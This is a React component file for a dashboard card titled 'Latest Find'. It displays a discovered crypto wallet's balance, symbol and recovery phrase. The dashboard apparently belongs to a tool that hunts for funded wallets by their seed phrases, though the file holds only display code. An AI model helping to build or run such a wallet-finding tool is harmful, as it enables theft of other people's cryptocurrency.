import React from 'react';
import { getIconForSymbol } from './blockchainIcons';
import { formatUSD, formatRelativeTime } from './dashboardFormat';
import SeedPhraseReveal from './SeedPhraseReveal';

const LatestFindCard = ({ lastWallet }) => {
  if (!lastWallet) {
    return (
      <div className="dash-chart-card dash-latest-find-card dash-latest-find-empty">
        <span className="dash-chart-card-title">Latest Find</span>
        <div className="dash-chart-empty">No wallets found yet.</div>
      </div>
    );
  }

  const icon = getIconForSymbol(lastWallet.symbol);

  return (
    <div className="dash-chart-card dash-latest-find-card">
      <span className="dash-chart-card-title">Latest Find</span>
      <div className="dash-latest-find-body">
        {icon && <img src={icon} alt="" className="dash-latest-find-icon" draggable="false" />}
        <div className="dash-latest-find-info">
          <span className="dash-latest-find-value">{formatUSD(lastWallet.balance)}</span>
          <span className="dash-latest-find-meta">
            {lastWallet.symbol} &middot; {formatRelativeTime(lastWallet.timestamp)}
          </span>
        </div>
      </div>
      <div className="dash-latest-find-seed">
        <span className="dash-latest-find-seed-label">Recovery phrase</span>
        <SeedPhraseReveal words={lastWallet.words} />
      </div>
    </div>
  );
};

export default LatestFindCard;
